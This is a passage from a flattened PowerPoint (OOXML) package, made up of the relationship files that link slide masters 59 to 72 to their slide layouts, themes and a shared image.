Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout580.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout571.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout589.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout588.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout587.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout586.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout585.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout584.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout583.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout582.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme59.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout590.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout581.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout59.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout58.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout56.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout54.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout60.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout599.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout598.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout597.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout596.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout595.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout594.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout593.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout592.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme60.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout600.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout591.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout609.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout608.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout607.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout606.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout605.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout604.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout603.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout602.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme61.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout610.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout601.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout619.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout618.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout617.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout616.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout615.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout614.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout613.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout612.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme62.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout620.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout611.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout629.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout628.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout627.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout626.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout625.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout624.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout623.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout622.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme63.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout630.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout621.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout639.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout638.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout637.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout636.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout635.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout634.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout633.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout632.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme64.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout640.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout631.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster65.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout649.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout648.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout647.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout646.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout645.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout644.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout643.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout642.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme65.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout650.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout641.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster66.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout659.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout658.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout657.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout656.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout655.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout654.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout653.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout652.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme66.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout660.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout651.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster67.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout669.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout668.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout667.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout666.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout665.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout664.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout663.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout662.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme67.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout670.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout661.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster68.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout679.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout678.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout677.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout676.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout675.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout674.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout673.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout672.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme68.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout680.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout671.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster69.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout689.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout688.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout687.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout686.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout685.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout684.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout683.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout682.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme69.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout690.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout681.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout69.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout68.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout67.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout66.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout65.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout64.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout63.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout70.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster70.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout699.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout698.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout697.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout696.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout695.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout694.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout693.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout692.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme70.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout700.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout691.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout709.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout708.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout707.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout706.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout705.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout704.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout703.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout702.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme71.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout710.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout701.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster72.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout719.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout718.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout717.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout716.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout715.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout714.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout713.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout712.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme72.xml"/><Relationship Id="rId11" 